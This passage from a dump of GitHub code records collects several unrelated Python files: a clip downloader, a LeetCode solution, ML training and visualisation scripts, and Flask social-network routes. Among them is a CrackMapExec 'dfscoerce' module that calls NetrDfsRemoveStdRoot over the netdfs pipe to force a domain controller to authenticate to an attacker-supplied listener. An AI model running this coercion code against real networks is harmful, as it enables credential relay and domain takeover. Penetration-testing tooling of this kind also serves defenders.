link).group(1)\n\ndef downlodFromId(link : str) -> None:\n id = getId(link)\n grabPost(mainFolder, id)\n\ndef downlodBulk(link : str) -> None:\n tags = link.split(\"=\")[-1] \n tagsLink = f\"https://www.sakugabooru.com/post.xml?tags={tags}\"\n pageNumber = 1\n\n res = http.request('GET', tagsLink)\n soup = bs(res.data, \"lxml\")\n posts = soup.find(\"posts\")\n postCount = int(posts[\"count\"])\n\n print(f\"{postCount} posts found.\")\n print(\"Downloading ...\")\n\n while postCount > 0:\n url = f\"{tagsLink}&limit=100&page={pageNumber}\"\n\n res = http.request('GET', url)\n soup = bs(res.data, \"lxml\")\n posts = soup.findAll(\"post\")\n\n for post in posts:\n grabPost(mainFolder, post[\"id\"])\n \n postCount -= 100\n pageNumber += 1\n\ndef downloadPool(link : str) -> None:\n res = http.request('GET', link)\n soup = bs(res.data, \"html.parser\")\n posts = soup.find_all('span', attrs={\"class\" : \"plid\"})\n poolTitle = soup.find(\"div\", attrs={\"id\" : \"pool-show\"}).find(\"h4\").text.split(':')[-1].strip()\n \n folder = f\"{mainFolder}/{poolTitle}\"\n\n for post in posts:\n grabPost(folder, getId(post.text))\n\nif __name__ == \"__main__\":\n links = input(\"Paste your links here : \").strip().split() \n errors = []\n\n for link in links:\n try:\n if \"tags=\" in link:\n downlodBulk(link)\n elif \"pool\" in link: \n downloadPool(link)\n else : \n downlodFromId(link)\n except:\n errors += link,\n \n if errors:\n with open(f\"{mainFolder}/ERRORS.txt\", \"w+\") as errorLog:\n for link in errors:\n errorLog.write(link + '\\n')\n\n print(\"DONE !!\")","repo_name":"RedaZt/SakugaGrabber","sub_path":"sakugagrabber.py","file_name":"sakugagrabber.py","file_ext":"py","file_size_in_byte":3431,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"7"} +{"seq_id":"14527903600","text":"class Solution:\n def isPalindrome(self, head: Optional[ListNode]) -> bool:\n \"\"\"\n Given the head of a singly linked list, returns True if\n it is a palindrome or false otherwise. This one really\n highlighted that I don't know much about leveraging the\n structure of linked lists.\n \"\"\"\n \n # convert linked list to a digit string\n current_value = [head.val]\n while head.next != None:\n current_value.append(head.next.val)\n head = head.next\n\n # compare to its reverse\n return current_value == current_value[::-1]\n","repo_name":"Foggalong/leetcode","sub_path":"problems/palindrome_linked_list/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"16333668315","text":"from util import *\nimport tensorflow as tf\nimport tensorflow.contrib.learn as learn\nimport scipy.stats\nimport numpy as np\nimport time\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.ensemble import ExtraTreesClassifier\nfrom sklearn.ensemble import AdaBoostRegressor\nimport sklearn\nfrom sklearn.ensemble import RandomForestRegressor\n\nclass TrainSKLearn(TrainModel):\n def __init__(self, data_set, name, alg, run_single_fold):\n super().__init__(data_set, run_single_fold)\n self.name=name\n self.alg=alg\n self.early_stop = 50\n self.params = str(alg)\n\n\n def train_model(self, x_train, y_train, x_val, y_val):\n print(\"Training SKLearn model: {}\".format(self.alg))\n\n x_train = x_train.as_matrix().astype(np.float32)\n y_train = y_train.as_matrix().astype(np.int32)\n\n #x_val = x_val.as_matrix().astype(np.float32)\n #y_val = y_val.as_matrix().astype(np.int32)\n\n self.alg.fit(x_train, y_train)\n\n self.steps = 0\n\n #self.classifier = clr.best_iteration\n return self.alg\n\n def predict_model(self, clr, x):\n x = x.as_matrix().astype(np.float32)\n\n if FIT_TYPE == FIT_TYPE_REGRESSION:\n return clr.predict(x)\n else:\n pred = clr.predict_proba(x)\n pred = np.array([v[1] for v in pred])\n return pred\n\n# \"all the time\" to \"always\"\n# reall short ones that are dead wrong\n\n# [100]\ttrain-logloss:0.288795\teval-logloss:0.329036\n# [598]\ttrain-logloss:0.152968\teval-logloss:0.296854\n# [984]\ttrain-logloss:0.096444\teval-logloss:0.293915\n\nn_trees = 100\nn_folds = 3\n\n# https://www.analyticsvidhya.com/blog/2015/06/tuning-random-forest-model/\nalg_list = [\n #['rforest',RandomForestRegressor(n_estimators=1000, n_jobs=-1, max_depth=3, criterion='mae')],\n #['extree',ExtraTreesClassifier(n_estimators = 1000,max_depth=2)],\n ['adaboost',AdaBoostRegressor(base_estimator=None, n_estimators=600, learning_rate=1.0, random_state=20160703)],\n #['knn', sklearn.neighbors.KNeighborsRegressor(n_neighbors=5)]\n]\n\nfor name,alg in alg_list:\n train = TrainSKLearn(\"1\",name,alg,False)\n train.run()\n train = None\n","repo_name":"MattHuntebrinker/earthquake","sub_path":"train_sklearn.py","file_name":"train_sklearn.py","file_ext":"py","file_size_in_byte":2174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"72859804702","text":"import numpy as np\nimport os.path as osp\nimport argparse\nimport cv2\nimport torch\nfrom torch.nn import functional as F\n\nimport torchreid\nfrom torchreid.utils import (\n check_isfile, mkdir_if_missing, load_pretrained_weights\n)\n\nIMAGENET_MEAN = [0.485, 0.456, 0.406]\nIMAGENET_STD = [0.229, 0.224, 0.225]\nGRID_SPACING = 10\n\n\n@torch.no_grad()\ndef visactmap(\n model,\n test_loader,\n save_dir,\n width,\n height,\n use_gpu,\n img_mean=None,\n img_std=None\n):\n if img_mean is None or img_std is None:\n # use imagenet mean and std\n img_mean = IMAGENET_MEAN\n img_std = IMAGENET_STD\n\n model.eval()\n\n for target in list(test_loader.keys()):\n data_loader = test_loader[target]['query'] # only process query images\n # original images and activation maps are saved individually\n actmap_dir = osp.join(save_dir, 'actmap_' + target)\n mkdir_if_missing(actmap_dir)\n print('Visualizing activation maps for {} ...'.format(target))\n\n for batch_idx, data in enumerate(data_loader):\n imgs, paths = data['img'], data['impath']\n if use_gpu:\n imgs = imgs.cuda()\n\n # forward to get convolutional feature maps\n try:\n outputs = model(imgs, return_featuremaps=True)\n except TypeError:\n raise TypeError(\n 'forward() got unexpected keyword argument \"return_featuremaps\". '\n 'Please add return_featuremaps as an input argument to forward(). When '\n 'return_featuremaps=True, return feature maps only.'\n )\n\n if outputs.dim() != 4:\n raise ValueError(\n 'The model output is supposed to have '\n 'shape of (b, c, h, w), i.e. 4 dimensions, but got {} dimensions. '\n 'Please make sure you set the model output at eval mode '\n 'to be the last convolutional feature maps'.format(\n outputs.dim()\n )\n )\n\n # compute activation maps\n outputs = (outputs**2).sum(1)\n b, h, w = outputs.size()\n outputs = outputs.view(b, h * w)\n outputs = F.normalize(outputs, p=2, dim=1)\n outputs = outputs.view(b, h, w)\n\n if use_gpu:\n imgs, outputs = imgs.cpu(), outputs.cpu()\n\n for j in range(outputs.size(0)):\n # get image name\n path = paths[j]\n imname = osp.basename(osp.splitext(path)[0])\n\n # RGB image\n img = imgs[j, ...]\n for t, m, s in zip(img, img_mean, img_std):\n t.mul_(s).add_(m).clamp_(0, 1)\n img_np = np.uint8(np.floor(img.numpy() * 255))\n img_np = img_np.transpose((1, 2, 0)) # (c, h, w) -> (h, w, c)\n\n # activation map\n am = outputs[j, ...].numpy()\n am = cv2.resize(am, (width, height))\n am = 255 * (am - np.min(am)) / (\n np.max(am) - np.min(am) + 1e-12\n )\n am = np.uint8(np.floor(am))\n am = cv2.applyColorMap(am, cv2.COLORMAP_JET)\n\n # overlapped\n overlapped = img_np*0.3 + am*0.7\n overlapped[overlapped > 255] = 255\n overlapped = overlapped.astype(np.uint8)\n\n # save images in a single figure (add white spacing between images)\n # from left to right: original image, activation map, overlapped image\n grid_img = 255 * np.ones(\n (height, 3*width + 2*GRID_SPACING, 3), dtype=np.uint8\n )\n grid_img[:, :width, :] = img_np[:, :, ::-1]\n grid_img[:,\n width + GRID_SPACING:2*width + GRID_SPACING, :] = am\n grid_img[:, 2*width + 2*GRID_SPACING:, :] = overlapped\n cv2.imwrite(osp.join(actmap_dir, imname + '.jpg'), grid_img)\n\n if (batch_idx+1) % 10 == 0:\n print(\n '- done batch {}/{}'.format(\n batch_idx + 1, len(data_loader)\n )\n )\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--root', type=str)\n parser.add_argument('-d', '--dataset', type=str, default='market1501')\n parser.add_argument('-m', '--model', type=str, default='osnet_x1_0')\n parser.add_argument('--weights', type=str)\n parser.add_argument('--save-dir', type=str, default='log')\n parser.add_argument('--height', type=int, default=256)\n parser.add_argument('--width', type=int, default=128)\n args = parser.parse_args()\n\n use_gpu = torch.cuda.is_available()\n\n datamanager = torchreid.data.ImageDataManager(\n root=args.root,\n sources=args.dataset,\n height=args.height,\n width=args.width,\n batch_size_train=100,\n batch_size_test=100,\n transforms=None,\n train_sampler='SequentialSampler'\n )\n test_loader = datamanager.test_loader\n\n model = torchreid.models.build_model(\n name=args.model,\n num_classes=datamanager.num_train_pids,\n use_gpu=use_gpu\n )\n\n if use_gpu:\n model = model.cuda()\n\n if args.weights and check_isfile(args.weights):\n load_pretrained_weights(model, args.weights)\n\n visactmap(\n model, test_loader, args.save_dir, args.width, args.height, use_gpu\n )\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Ascend/ModelZoo-PyTorch","sub_path":"PyTorch/contrib/cv/classification/OSNet/tools/visualize_actmap.py","file_name":"visualize_actmap.py","file_ext":"py","file_size_in_byte":5601,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"7"} +{"seq_id":"24729273986","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom impacket import system_errors\nfrom impacket.dcerpc.v5 import transport\nfrom impacket.dcerpc.v5.ndr import NDRCALL\nfrom impacket.dcerpc.v5.dtypes import ULONG, WSTR, DWORD\nfrom impacket.dcerpc.v5.rpcrt import DCERPCException\nfrom impacket.uuid import uuidtup_to_bin\nfrom cme.logger import cme_logger\n\n\nclass CMEModule:\n name = \"dfscoerce\"\n description = \"Module to check if the DC is vulnerable to DFSCocerc, credit to @filip_dragovic/@Wh04m1001 and @topotam\"\n supported_protocols = [\"smb\"]\n opsec_safe = True\n multiple_hosts = True\n\n def __init__(self, context=None, module_options=None):\n self.context = context\n self.module_options = module_options\n self.listener = None\n\n def options(self, context, module_options):\n \"\"\"\n LISTENER Listener Address (defaults to 127.0.0.1)\n \"\"\"\n self.listener = \"127.0.0.1\"\n if \"LISTENER\" in module_options:\n self.listener = module_options[\"LISTENER\"]\n\n def on_login(self, context, connection):\n trigger = TriggerAuth()\n dce = trigger.connect(\n username=connection.username,\n password=connection.password,\n domain=connection.domain,\n lmhash=connection.lmhash,\n nthash=connection.nthash,\n target=connection.host if not connection.kerberos else connection.hostname + \".\" + connection.domain,\n doKerberos=connection.kerberos,\n dcHost=connection.kdcHost,\n aesKey=connection.aesKey,\n )\n\n if dce is not None:\n context.log.debug(\"Target is vulnerable to DFSCoerce\")\n trigger.NetrDfsRemoveStdRoot(dce, self.listener)\n context.log.highlight(\"VULNERABLE\")\n context.log.highlight(\"Next step: https://github.com/Wh04m1001/DFSCoerce\")\n dce.disconnect()\n\n else:\n context.log.debug(\"Target is not vulnerable to DFSCoerce\")\n\n\nclass DCERPCSessionError(DCERPCException):\n def __init__(self, error_string=None, error_code=None, packet=None):\n DCERPCException.__init__(self, error_string, error_code, packet)\n\n def __str__(self):\n key = self.error_code\n if key in system_errors.ERROR_MESSAGES:\n error_msg_short = system_errors.ERROR_MESSAGES[key][0]\n error_msg_verbose = system_errors.ERROR_MESSAGES[key][1]\n return \"DFSNM SessionError: code: 0x%x - %s - %s\" % (\n self.error_code,\n error_msg_short,\n error_msg_verbose,\n )\n else:\n return \"DFSNM SessionError: unknown error code: 0x%x\" % self.error_code\n\n\n################################################################################\n# RPC CALLS\n################################################################################\nclass NetrDfsRemoveStdRoot(NDRCALL):\n opnum = 13\n structure = (\n (\"ServerName\", WSTR),\n (\"RootShare\", WSTR),\n (\"ApiFlags\", DWORD),\n )\n\n\nclass NetrDfsRemoveStdRootResponse(NDRCALL):\n structure = ((\"ErrorCode\", ULONG),)\n\n\nclass NetrDfsAddRoot(NDRCALL):\n opnum = 12\n structure = (\n (\"ServerName\", WSTR),\n (\"RootShare\", WSTR),\n (\"Comment\", WSTR),\n (\"ApiFlags\", DWORD),\n )\n\n\nclass NetrDfsAddRootResponse(NDRCALL):\n structure = ((\"ErrorCode\", ULONG),)\n\n\nclass TriggerAuth:\n def connect(self, username, password, domain, lmhash, nthash, aesKey, target, doKerberos, dcHost):\n rpctransport = transport.DCERPCTransportFactory(r\"ncacn_np:%s[\\PIPE\\netdfs]\" % target)\n if hasattr(rpctransport, \"set_credentials\"):\n rpctransport.set_credentials(\n username=username,\n password=password,\n domain=domain,\n lmhash=lmhash,\n nthash=nthash,\n aesKey=aesKey,\n )\n\n if doKerberos:\n rpctransport.set_kerberos(doKerberos, kdcHost=dcHost)\n # if target:\n # rpctransport.setRemoteHost(target)\n\n rpctransport.setRemoteHost(target)\n dce = rpctransport.get_dce_rpc()\n cme_logger.debug(\"[-] Connecting to %s\" % r\"ncacn_np:%s[\\PIPE\\netdfs]\" % target)\n try:\n dce.connect()\n except Exception as e:\n cme_logger.debug(\"Something went wrong, check error status => %s\" % str(e))\n return\n try:\n dce.bind(uuidtup_to_bin((\"4FC742E0-4A10-11CF-8273-00AA004AE673\", \"3.0\")))\n except Exception as e:\n cme_logger.debug(\"Something went wrong, check error status => %s\" % str(e))\n return\n cme_logger.debug(\"[+] Successfully bound!\")\n return dce\n\n def NetrDfsRemoveStdRoot(self, dce, listener):\n cme_logger.debug(\"[-] Sending NetrDfsRemoveStdRoot!\")\n try:\n request = NetrDfsRemoveStdRoot()\n request[\"ServerName\"] = \"%s\\x00\" % listener\n request[\"RootShare\"] = \"test\\x00\"\n request[\"ApiFlags\"] = 1\n if self.args.verbose:\n cme_logger.debug(request.dump())\n # logger.debug(request.dump())\n resp = dce.request(request)\n\n except Exception as e:\n cme_logger.debug(e)\n","repo_name":"byt3bl33d3r/CrackMapExec","sub_path":"cme/modules/dfscoerce.py","file_name":"dfscoerce.py","file_ext":"py","file_size_in_byte":5273,"program_lang":"python","lang":"en","doc_type":"code","stars":7833,"dataset":"github-code","pt":"7"} +{"seq_id":"40929777468","text":"from flask import render_template, flash, redirect, url_for, request\nfrom flask_login import current_user, login_required\nfrom flask_babel import _\nfrom app.main.forms import EditProfileForm, PostForm, ComForm, EditPostForm, EditCom\nfrom app.models import User, Post\nfrom app.main import bp\nfrom flask_paginate import Pagination, get_page_args\nfrom datetime import datetime\nfrom app.dbconn import conn\n\nconn = conn()\n\n\n@bp.route('/', methods=['GET', 'POST'])\n@bp.route('/index', methods=['GET', 'POST'])\n@login_required\ndef index():\n return redirect(url_for('main.user', id=current_user.id))\n\n\n@bp.route('/edit_post/', methods=['GET', 'POST'])\n@login_required\ndef edit_post(id):\n form = EditPostForm()\n cursor = conn.cursor()\n cursor.execute('select * from Uzer where login = %s',\n [current_user.login])\n user = cursor.fetchone()\n cursor.execute('SELECT * FROM POST WHERE idpost = %s', [id])\n text = cursor.fetchone()\n conn.commit()\n #vremya = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n if form.validate_on_submit():\n if user is None:\n return redirect(url_for('main.user', id=user[4]))\n else:\n cursor.execute('UPDATE POST SET tekst = %s WHERE idpost = %s', [form.editpost.data, id])\n conn.commit()\n return redirect(url_for('main.user', id=text[4]))\n elif request.method == 'GET':\n form.editpost.data = text[0]\n return render_template('edit_post.html', title=_('Редактирование') ,form=form)\n\n\n@bp.route('/edit_com/', methods=['GET', 'POST'])\n@login_required\ndef edit_com(id):\n form = EditCom()\n cursor = conn.cursor()\n cursor.execute('select * from Uzer where login = %s',\n [current_user.login])\n user = cursor.fetchone()\n cursor.execute('SELECT * FROM com WHERE idcom = %s', [id])\n text = cursor.fetchone()\n conn.commit()\n #vremya = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n if form.validate_on_submit():\n if user is None:\n return redirect(url_for('main.user', id=user[4]))\n else:\n cursor.execute('UPDATE COM SET tekst = %s WHERE idcom = %s', [form.editcom.data, id])\n conn.commit()\n return redirect(url_for('main.user', id=text[5]))\n elif request.method == 'GET':\n form.editcom.data = text[0]\n return render_template('edit_post.html', title=_('Редактирование') ,form=form)\n\n\n@bp.route('/user/id', methods=['GET', 'POST'])\n@login_required\ndef user(id):\n cursor = conn.cursor()\n cursor.execute('select * from Uzer where iduser = %s',\n [id])\n user = cursor.fetchone()\n conn.commit()\n if user is None:\n return redirect(url_for('main.index'))\n if current_user.id != user[4]:\n cursor.execute('select * from addfriend where id2user = %s and id1user = %s',\n [current_user.id,user[4]])\n frend = cursor.fetchone()\n conn.commit()\n if frend is None:\n followed = False\n else:\n followed = True\n cursor.execute('select count(*) from addfriend where id1user = %s',\n [user[4]])\n followers = cursor.fetchone()\n followers = int(followers[0])\n cursor.execute('select count(*) from addfriend where id2user = %s',\n [user[4]])\n following = cursor.fetchone()\n following = int(following[0])\n conn.commit()\n form = PostForm()\n if form.validate_on_submit():\n vremya = datetime.now().strftime(\"%Y-%m-%d %X\")\n if id == current_user.id:\n cursor.execute('INSERT INTO post(tekst,datapost,idavtor,idrecepient) VALUES (%s,%s,%s,%s)',\n [form.post.data,vremya,current_user.id,current_user.id])\n conn.commit()\n else:\n cursor.execute('INSERT INTO post(tekst,datapost,idavtor,idrecepient) VALUES (%s,%s,%s,%s)',\n [form.post.data, vremya, current_user.id, user[4]])\n conn.commit()\n return redirect(url_for('main.user', id=user[4]))\n cursor.execute(\n 'SELECT * FROM POST inner join uzer on uzer.iduser = post.idavtor WHERE idrecepient = %s order by datapost DESC',\n [user[4]])\n posts = cursor.fetchall()\n conn.commit()\n cursor.execute(\n 'SELECT * FROM POST inner join com on post.idpost=com.idpost inner join uzer on uzer.iduser = com.idavtor WHERE post.idrecepient = %s order by datacom ASC',\n [user[4]])\n coms = cursor.fetchall()\n conn.commit()\n page, per_page, offset = get_page_args(page_parameter='page',\n per_page_parameter='per_page')\n cursor.execute(\n 'SELECT count(*) FROM POST WHERE idrecepient = %s',\n [user[4]])\n total = cursor.fetchone()\n conn.commit()\n pagination_posts = posts[offset: offset + per_page]\n pagination = Pagination(page=page, total=total[0], record_name='posts', css_framework='bootstrap4', per_page=10)\n return render_template('user.html', form=form, user=user, fio=user[0], logen=user[5], about_me=user[7], followed=followed,\n following=following, followers=followers, posts=pagination_posts, avatar=user[8], coms=coms, id=user[4], pagination=pagination)\n\n\n@bp.route('/user/id/popup')\n@login_required\ndef user_popup(id):\n cursor = conn.cursor()\n cursor.execute('select * from Uzer where iduser = %s',\n [id])\n user = cursor.fetchone()\n conn.commit()\n if user is None:\n flash(_('User %(username)s not found.', username=user[5]))\n return redirect(url_for('main.index'))\n if current_user.id != user[4]:\n cursor.execute('select * from addfriend where id2user = %s and id1user = %s',\n [current_user.id,id])\n frend = cursor.fetchone()\n conn.commit()\n if frend is None:\n followed = False\n else:\n followed = True\n cursor.execute(\n 'SELECT * FROM vo natural join kafedra natural join facultet natural join vuz where iduser = %s', [id])\n vishobr = cursor.fetchone()\n conn.commit()\n if vishobr is not None:\n kafedra = vishobr[6]\n facultet = vishobr[7]\n vuz = vishobr[8]\n else:\n kafedra = None\n facultet = None\n vuz = None\n cursor.execute('select count(*) from addfriend where id1user = %s',\n [id])\n followers = cursor.fetchone()\n followers = int(followers[0])\n cursor.execute('select count(*) from addfriend where id2user = %s',\n [id])\n following = cursor.fetchone()\n following = int(following[0])\n conn.commit()\n return render_template('user_popup.html', user=user, fio=user[0], logen=user[5], about_me=user[7], followed=followed,\n following=following, followers=followers, avatar=user[8], phone=user[1], gender=user[2],\n dr=user[3], vuz=vuz, kafedra=kafedra, facultet=facultet, iduser=user[4])\n\n\n@bp.route('/edit_profile', methods=['GET', 'POST'])\n@login_required\ndef edit_profile():\n form = EditProfileForm(current_user.login)\n cursor = conn.cursor()\n vuz = form.SelVUZ.data\n cursor.execute('select idFack,nameFack from facultet where idvuz = %s', [vuz])\n fack = cursor.fetchall()\n conn.commit()\n kolvofack = len(fack)\n form.SelFack.choices = fack\n Fack = form.SelFack.data\n cursor.execute('select idKafedra,nameKafedra from kafedra where idfack = %s', [Fack])\n kaf = cursor.fetchall()\n conn.commit()\n form.SelKaf.choices = kaf\n Kaf = form.SelKaf.data\n if form.validate_on_submit():\n cursor = conn.cursor()\n current_user.fio = form.fio.data\n current_user.phone = form.phone.data\n current_user.gender = form.gender.data\n current_user.about_me = form.about_me.data\n current_user.avatar = form.avatar.data\n cursor.execute('update Uzer set fio = %s, login = %s, phone = %s, gender = %s, about_me = %s, avatar = %s where login = %s',\n [current_user.fio,form.login.data,current_user.phone,current_user.gender,current_user.about_me,current_user.avatar,current_user.login])\n conn.commit()\n cursor.execute('SELECT iduser FROM VO WHERE iduser = %s', [current_user.id])\n iduser = cursor.fetchone()\n conn.commit()\n if iduser is None:\n cursor.execute('INSERT INTO VO(iduser,idvuz,idfack,idkafedra) VALUES(%s,%s,%s,%s)', [current_user.id,vuz,Fack,Kaf])\n conn.commit()\n else:\n cursor.execute('UPDATE VO SET idvuz = %s,idfack = %s, idkafedra = %s WHERE iduser = %s',\n [vuz, Fack, Kaf,current_user.id])\n conn.commit()\n current_user.login = form.login.data\n flash(_('Your changes have been saved.'))\n return redirect(url_for('main.edit_profile'))\n elif request.method == 'GET':\n form.fio.data = current_user.fio\n form.login.data = current_user.login\n form.phone.data = current_user.phone\n form.gender.data = current_user.gender\n form.about_me.data = current_user.about_me\n form.avatar.data = current_user.avatar\n cursor.execute('SELECT idvuz,idfack,idkafedra from VO where iduser = %s', [current_user.id])\n numb = cursor.fetchone()\n if numb is not None:\n form.SelVUZ.data = numb[0]\n form.SelFack.data = numb[1]\n form.SelKaf.data = numb[2]\n return render_template('edit_profile.html', title=_('Edit Profile'),\n form=form, vuz=vuz, kolvofack=kolvofack, Kaf=Kaf, fack=fack)\n\n\n@bp.route('/follow/')\n@login_required\ndef follow(id):\n cursor = conn.cursor()\n cursor.execute('select * from Uzer where iduser = %s',\n [id])\n user = cursor.fetchone()\n conn.commit()\n if user is None:\n flash(_('User %(username)s not found.', username=user[5]))\n return redirect(url_for('main.index'))\n if current_user.login == user[5]:\n flash(_('You cannot unfollow yourself!'))\n return redirect(url_for('main.user', id=user[4]))\n cursor = conn.cursor()\n cursor.execute(\n 'insert into addfriend (dataadd,id1user,id2user) values(clock_timestamp(),%s,%s)',\n (user[4], current_user.id))\n cursor.close()\n conn.commit()\n flash(_('You are following %(username)s!', username=user[5]))\n return redirect(url_for('main.user', id=user[4]))\n\n\n@bp.route('/unfollow/')\n@login_required\ndef unfollow(id):\n cursor = conn.cursor()\n cursor.execute('select * from Uzer where iduser = %s',\n [id])\n user = cursor.fetchone()\n conn.commit()\n if user is None:\n flash(_('User %(username)s not found.', username=user[5]))\n return redirect(url_for('main.index'))\n if user == current_user:\n flash(_('You cannot unfollow yourself!'))\n return redirect(url_for('main.user', id=user[4]))\n cursor.execute(\n 'DELETE FROM addfriend WHERE id2user = %s and id1user = %s',\n [current_user.id,user[4]])\n conn.commit()\n flash(_('You are not following %(username)s.', username=user[5]))\n return redirect(url_for('main.user', id=user[4]))\n\n\n@bp.route('/deletepost/')\n@login_required\ndef deletepost(id):\n cursor = conn.cursor()\n cursor.execute('select * from Uzer where login = %s',\n [current_user.login])\n user = cursor.fetchone()\n if user[5] == current_user.login:\n if current_user.login == 'tehno-09@mail.ru':\n cursor.execute(\n 'SELECT idrecepient from post where idpost=%s',\n [id])\n biba = cursor.fetchone()\n conn.commit()\n cursor.execute(\n 'SELECT * from com where idpost = %s',\n [id])\n bibaboba = cursor.fetchone()\n conn.commit()\n if bibaboba is None:\n cursor.execute(\n 'DELETE FROM post WHERE idpost=%s',\n [id])\n conn.commit()\n else:\n cursor.execute('DELETE FROM COM WHERE idpost=%s', [id])\n conn.commit()\n cursor.execute(\n 'DELETE FROM post WHERE idpost = %s',\n [id])\n conn.commit()\n cursor.close()\n return redirect(url_for('main.user', id=biba[0]))\n else:\n cursor.execute(\n 'SELECT idrecepient from post where (idavtor = %s and idpost = %s) or (idrecepient = %s and idpost = %s)',\n [current_user.id, id, current_user.id, id])\n biba = cursor.fetchone()\n cursor.execute(\n 'SELECT * from com where idpost = %s',\n [id])\n bibaboba = cursor.fetchone()\n conn.commit()\n if bibaboba is None:\n cursor.execute(\n 'DELETE FROM post WHERE (idavtor = %s and idpost = %s) or (idrecepient = %s and idpost = %s)',\n [current_user.id, id, current_user.id, id])\n conn.commit()\n else:\n cursor.execute('DELETE FROM COM WHERE idpost=%s', [id])\n conn.commit()\n cursor.execute(\n 'DELETE FROM post WHERE (idavtor = %s and idpost = %s) or (idrecepient = %s and idpost = %s)',\n [current_user.id, id, current_user.id, id])\n conn.commit()\n return redirect(url_for('main.user', id=biba[0]))\n return redirect(url_for('main.user', id=current_user.id))\n\n\n@bp.route('/comment/', methods=['GET', 'POST'])\n@login_required\ndef comment(id):\n cursor = conn.cursor()\n cursor.execute('select * from Uzer where login = %s',\n [current_user.login])\n user = cursor.fetchone()\n cursor.execute('select idrecepient,idavtor from post where idpost = %s',\n [id])\n usten = cursor.fetchone()\n conn.commit()\n forma = ComForm()\n if forma.validate_on_submit():\n vremy = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n if user is None:\n return redirect(url_for('main.index'))\n else:\n cursor.execute('INSERT INTO com(tekst,datacom,idavtor,idpost,idrecepient,idrecepientpost) VALUES (%s,%s,%s,%s,%s,%s)',\n [forma.com.data, vremy, current_user.id, id, usten[0],usten[1]])\n conn.commit()\n return redirect(url_for('main.user', id=usten[0]))\n return render_template('sendcom.html', forma=forma)\n\n@bp.route('/deletecom/')\n@login_required\ndef deletecom(id):\n cursor = conn.cursor()\n cursor.execute('select * from Uzer where login = %s',\n [current_user.login])\n user = cursor.fetchone()\n if user[5] == current_user.login:\n if current_user.login == 'tehno-09@mail.ru':\n cursor.execute(\n 'SELECT idrecepient from com where idcom=%s',\n [id])\n biba = cursor.fetchone()\n conn.commit()\n cursor.execute(\n 'DELETE FROM com WHERE idcom=%s',\n [id])\n conn.commit()\n cursor.close()\n return redirect(url_for('main.user', id=biba[0]))\n else:\n cursor.execute(\n 'SELECT idrecepient from com where (idavtor = %s and idcom = %s) or (idrecepient = %s and idcom = %s)',\n [current_user.id, id, current_user.id, id])\n biba = cursor.fetchone()\n conn.commit()\n cursor.execute(\n 'DELETE FROM com WHERE (idavtor = %s and idcom = %s) or (idrecepient = %s and idcom = %s)',\n [current_user.id, id, current_user.id, id])\n conn.commit()\n cursor.close()\n return redirect(url_for('main.user', id=biba[0]))\n return redirect(url_for('main.user', id=current_user.id))\n\n\n@bp.route('/following/', methods=['GET', 'POST'])\n@login_required\ndef folowww(id):\n cursor = conn.cursor()\n cursor.execute('select * from Uzer where iduser = %s',\n [id])\n user = cursor.fetchone()\n cursor.execute(\n 'SELECT * FROM addfriend inner join uzer on addfriend.id1user=uzer.iduser and addfriend.id2user = %s',\n [id])\n frendi = cursor.fetchall()\n conn.commit()\n friendempty = False\n if len(frendi) == 0:\n friendempty = True\n idfoll = id\n return render_template('unfoloww.html', title=_('Пiдписки'), frendi=frendi, friendempty=friendempty, idfoll=idfoll,\n login=user[5], id=user[4])\n\n\n@bp.route('/followers/', methods=['GET', 'POST'])\n@login_required\ndef foloww(id):\n cursor = conn.cursor()\n cursor.execute('select * from Uzer where iduser = %s',\n [id])\n user = cursor.fetchone()\n cursor.execute(\n 'SELECT * FROM addfriend inner join uzer on addfriend.id2user=uzer.iduser and addfriend.id1user = %s',\n [id])\n frendi = cursor.fetchall()\n conn.commit()\n friendempty = False\n if len(frendi) == 0:\n friendempty = True\n idfoll = id\n return render_template('foloww.html', title=_('Пiдписники'), frendi=frendi, friendempty=friendempty, idfoll=idfoll,\n login=user[5], id=user[4])\n\n\n@bp.route('/delete_profile/')\n@login_required\ndef delete_profile(id):\n cursor = conn.cursor()\n cursor.execute('select * from Uzer where login = %s',\n [current_user.login])\n user = cursor.fetchone()\n conn.commit()\n if user[5] == current_user.login and current_user.login == 'tehno-09@mail.ru':\n cursor.execute(\n 'DELETE FROM addfriend WHERE id1user = %s or id2user = %s',\n [id,id])\n conn.commit()\n cursor.execute(\n 'DELETE FROM com WHERE idavtor = %s or idrecepient = %s or idrecepientpost =%s',\n [id,id,id])\n conn.commit()\n cursor.execute(\n 'DELETE FROM post WHERE idavtor = %s or idrecepient = %s',\n [id,id])\n conn.commit()\n cursor.execute(\n 'DELETE FROM vo WHERE iduser = %s',\n [id])\n conn.commit()\n cursor.execute(\n 'DELETE FROM uzer WHERE iduser = %s',\n [id])\n conn.commit()\n return redirect(url_for('main.user', id=id))\n return redirect(url_for('main.user', id=current_user.id))","repo_name":"b4r4b4n/sosnet","sub_path":"app/main/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":18472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"11910313077","text":"from app import create_app\nfrom flask import request, jsonify, abort\nfrom app.token import verify_token\nfrom app.models import User, Role\nfrom flask_login import login_user\n\napp = create_app('dev')\n\nno_login_request = []\n\n\ndef add_config():\n no_login_request.append('/user/login')\n no_login_request.append('/user/check_token')\n no_login_request.append('/user/upload_user_info_csv')\n # no_login_request.append('/user/download_import_user_template')\n\n\nadd_config()\n\n\n@app.before_request\ndef check_token():\n # request.path\n if request.path in no_login_request:\n return\n form = request.form\n if form:\n cookie_token = form.get('token')\n cookie_id = form.get('user_id')\n if cookie_token:\n user_info_string = verify_token(cookie_token)\n user_id = int(user_info_string['user_id'])\n cookie_id = int(cookie_id)\n if user_id == cookie_id:\n user = User.load_user(user_id)\n if 